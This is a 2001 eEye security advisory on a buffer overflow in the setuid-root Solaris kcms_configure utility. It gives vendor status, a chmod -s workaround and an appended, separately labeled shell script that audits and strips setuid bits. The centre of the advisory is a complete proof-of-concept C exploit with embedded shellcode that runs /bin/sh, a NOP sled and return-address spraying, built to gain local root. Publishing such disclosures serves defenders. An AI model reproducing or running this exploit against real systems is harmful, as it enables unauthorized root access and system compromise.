
From: eEye Digital Security (eeye@EEYE.COM)
Date: Mon Apr 09 2001 - 19:25:10 CDT


    Solaris kcms_configure vulnerability

    Discovered and exploited by:
    Riley Hassell riley@eeye.com

    Release Date:
    April 9, 2001

    Systems Affected:
    Solaris 7/8 (x86 and sparc)
    Earlier versions are most likely affected as well

    Description:
    It was another long day at eEye where the beer was once again cold but eEye
    Wudan member Riley decided it was time to do some Solaris spring cleaning.
    This is the first of several advisories to be released on various Solaris
    bugs that were lying around needing to be cleaned out.

    We have discovered a buffer overflow in the kcms_configure utility provided
    with Solaris 7. The problem exists in the parsing of command line options:
    an overly long option argument overflows a fixed-size buffer. Because the
    utility is installed setuid root, an attacker exploiting this vulnerability
    can achieve local root privileges. The Kodak Color Management System (KCMS)
    packages have contained many vulnerabilities in the past; we recommend
    disabling them if you are not currently using them.

    Proof of Concept:

    /*
     Command line argument overflow
     /usr/openwin/bin/kcms_configure

     Proof of Concept Exploitation
     Riley Hassell
    */

    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>
    #include <unistd.h>

    #define BUFLEN 1100

    /* seteuid/exec shellcode */
    char shell[] =
    "\xeb\x0a\x9a\x01\x02\x03\x5c\x07\x04\xc3\xeb\x05\xe8\xf9\xff\xff\xff"
    "\x5e\x29\xc0\x88\x46\xf7\x89\x46\xf2\x50\xb0\x8d\xe8\xe0\xff\xff\xff"
    "\x29\xc0\x50\xb0\x17\xe8\xd6\xff\xff\xff\xeb\x1f\x5e\x8d\x1e\x89\x5e"
    "\x0b\x29\xc0\x88\x46\x19\x89\x46\x14\x89\x46\x0f\x89\x46\x07\xb0"
    "\x3b\x8d\x4e\x0b\x51\x51\x53\x50\xeb\x18\xe8\xdc\xff\xff\xff\x2f\x62"
    "\x69\x6e\x2f\x73\x68\x01\x01\x01\x01\x02\x02\x02\x02\x03\x03\x03"
    "\x03\x9a\x04\x04\x04\x04\x07\x04";

    char buf[BUFLEN];              /* oversized argument passed to kcms_configure */
    unsigned long int nop, esp;
    long int offset = 0;

    /* return the current stack pointer (x86 GCC: value left in %eax) */
    unsigned long int get_esp() { __asm__("movl %esp,%eax"); }

    int main(int argc, char *argv[])
    {
        int i;

        /* optional stack offset from the command line, default -300 */
        if (argc > 1)
            offset = strtol(argv[1], NULL, 0);
        else
            offset = -300;
        nop = 600;                 /* length of the NOP sled */
        esp = get_esp();

        memset(buf, 0x90, BUFLEN); /* NOP sled */
        memcpy(buf + 600, shell, strlen(shell));
        /* fill the remainder with the guessed return address */
        for (i = nop + strlen(shell) + 1; i <= BUFLEN - 4; i += 4)
            *((int *) &buf[i]) = esp + offset;
        buf[BUFLEN - 1] = '\0';

        execl("/usr/openwin/bin/kcms_configure", "eEye",
              "-o", "-S", "X", buf, NULL);
        return 0;
    }

    Vendor Status:
    Sun Microsystems has been contacted. They are currently working on patches
    for this and other related vulnerabilities eEye has discovered. We would
    like to thank them for working with us on creating a patch for this
    vulnerability.

    Workaround:
    chmod -s /usr/openwin/bin/kcms_configure
    This removes the setuid bit from kcms_configure, so that if someone does
    exploit this vulnerability, they won’t gain higher privileges.
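An added example, not part of eEye's advisory: a POSIX sh audit that lists setuid binaries under a directory (defaulting to /usr/openwin/bin, the path named above) and applies the advisory's chmod -s workaround, verifying afterwards that the bit is really gone. The function names and the directory argument are assumptions.

```shell
#!/bin/sh
# Added example: audit setuid binaries and apply the chmod -s workaround.
# Assumes POSIX sh, find(1) and test(1) -u; function names are assumptions.
# The default directory is the one the advisory names.
KCMS_DIR_DEFAULT=/usr/openwin/bin

# list_setuid [DIR]: print setuid regular files under DIR, sorted, one per line
list_setuid() {
    find "${1:-$KCMS_DIR_DEFAULT}" -type f -perm -4000 2>/dev/null | sort
}

# is_setuid FILE: succeed when FILE carries the setuid bit
is_setuid() {
    [ -u "$1" ]
}

# strip_setuid FILE: apply the workaround (chmod -s) and succeed only if
# the setuid bit is confirmed gone afterwards
strip_setuid() {
    chmod -s "$1" || return 1
    ! is_setuid "$1"
}

# report [DIR]: one line per setuid file, flagging kcms_configure specifically
report() {
    list_setuid "$1" | while IFS= read -r f; do
        case "$f" in
            */kcms_configure) echo "SETUID (advisory target): $f" ;;
            *)                echo "setuid: $f" ;;
        esac
    done
}

# Run directly with a directory argument to audit it; without one it reports
# on the default directory (no output where that directory does not exist).
report "${1:-}"
```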

    Greetings:
    ADM, Ryan “shellcode ninja” Permeh, KAM, Lamagra, Zen-Parse, Loki, and last
    but not least… all the kick ass people at Speakeasy.net.

    Copyright (c) 1998-2001 eEye Digital Security
    Permission is hereby granted for the redistribution of this alert
    electronically. It is not to be edited in any way without express consent of
    eEye. If you wish to reprint the whole or any part of this alert in any
    other medium excluding electronic medium, please e-mail alert@eEye.com for
    permission.

    Disclaimer
    The information within this paper may change without notice. Use of this
    information constitutes acceptance for use in an AS IS condition. There are
    NO warranties with regard to this information. In no event shall the author
    be liable for any damages whatsoever arising out of or in connection with
    the use or spread of this information. Any use of this information is at the
    user's own risk.

    Feedback
    Please send suggestions, updates, and comments to:

    eEye Digital Security
    http://www.eEye.com
    info@eEye.com